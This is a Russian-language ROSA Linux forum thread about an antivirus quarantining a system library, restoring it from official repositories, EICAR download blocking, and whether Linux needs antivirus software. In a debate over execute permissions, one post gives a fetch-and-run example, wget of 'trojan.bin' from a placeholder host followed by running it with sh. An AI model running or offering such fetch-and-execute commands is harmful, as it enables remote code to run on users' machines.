ROSA Forum

Другой бэкдор для Mac OS X — Mac.BackDoor.Tsunami — является адаптированной под архитектуру Apple версией троянца для Linux с названием Linux.BackDoor.Tsunami. Злоумышленники управляют им с использованием протокола IRC (Internet Relay Chat).

Barmalei писал(а):Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

PastorDi писал(а):

Barmalei писал(а):Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.

Barmalei писал(а):Карантина не нашел. Доктор молчит. Может дадите этот файл мне?

notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64

notauser писал(а):http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

Barmalei писал(а):

notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64

А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.

urpmi --replacepkgs lib64gcrypt20

PastorDi писал(а): Проще так будет:

Код: Выделить всё

urpmi --replacepkgs lib64gcrypt20

notauser писал(а):Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20

Barmalei писал(а):

PastorDi писал(а): Проще так будет:

Код: Выделить всё

urpmi --replacepkgs lib64gcrypt20

Ваш вариант не прошел.

notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

notauser писал(а):

notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

PastorDi писал(а):Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Галахов Роман писал(а):

PastorDi писал(а):Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такое

slavyanix писал(а):setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.

PastorDi писал(а):Трояны уже вшиты в линукс! Чё вы так волнуетесь?

slavyanix писал(а):любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)).

cd
wget -c http://somebody.com/trojan.bin
sh ~/trojan.bin

Barmalei писал(а):но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.

viktor писал(а):> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

slavyanix писал(а): попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр  1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True

slavyanix писал(а):

viktor писал(а):> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

PastorDi писал(а):Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.

Barmalei писал(а):Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Галахов Роман писал(а):

Barmalei писал(а):Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверить

Barmalei писал(а):Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.html
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.

Barmalei писал(а):Ладно. Скоро снесу DrWeb и проверю.

PastorDi писал(а):

Barmalei писал(а):Ладно. Скоро снесу DrWeb и проверю.

На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!

Barmalei писал(а):Удалил DrWeb. Кто то дальше блокирует.

Barmalei писал(а):

notauser писал(а):http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

Спасибо. Я рылся так и не нашел.

$ urpmf libgcrypt.so.20.0.1
lib64gcrypt20:/usr/lib64/libgcrypt.so.20.0.1
libgcrypt20:/usr/lib/libgcrypt.so.20.0.1

$ urpmq --sources lib64gcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm

$ urpmq --sources libgcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

$ wget http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

$ ark -d lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm
$ ark -d libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

Галахов Роман писал(а):

Barmalei писал(а):Удалил DrWeb. Кто то дальше блокирует.

Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?

Barmalei писал(а):Только мультимедиа.

Галахов Роман писал(а):

Barmalei писал(а):Только мультимедиа.

Странно... Установил ваши расширения:

пкйц6.png

И снова все скачал...
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?

Галахов Роман писал(а):Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

Barmalei писал(а):Я его выключил и скачал, с ним блокирует.

Barmalei писал(а):

Галахов Роман писал(а):Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

Я его выключил и скачал, с ним блокирует.

Галахов Роман писал(а):

Barmalei писал(а):Я его выключил и скачал, с ним блокирует.

Очень странно... При одних и тех же настройках FF срабатывает по разному...

PastorDi писал(а):

Галахов Роман писал(а): Очень странно... При одних и тех же настройках FF срабатывает по разному...

Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

Barmalei писал(а):

PastorDi писал(а): Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

Прослойка Доктора не блокирует, а ловит и ложит в карантин.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.

ans писал(а):новые подробности

ans писал(а):Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml

slavyanix писал(а): это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

Xakep писал(а):Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...

картинка13.jpeg

notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Алзим писал(а):

notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Barmalei писал(а): Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

Алзим писал(а):

Barmalei писал(а): Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.

slavyanix писал(а):ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.

slavyanix писал(а): это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

Barmalei писал(а): Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

Алзим писал(а):

notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Алзим писал(а):

Barmalei писал(а): Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.

Barmalei писал(а): В некоторой степени все же виноваты сами юзверы.

Delles писал(а):Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.

Barmalei писал(а):Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

Delles писал(а):

Barmalei писал(а):Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.

Barmalei писал(а):воруют ФТП доступы и удаляются. А других потом шифруют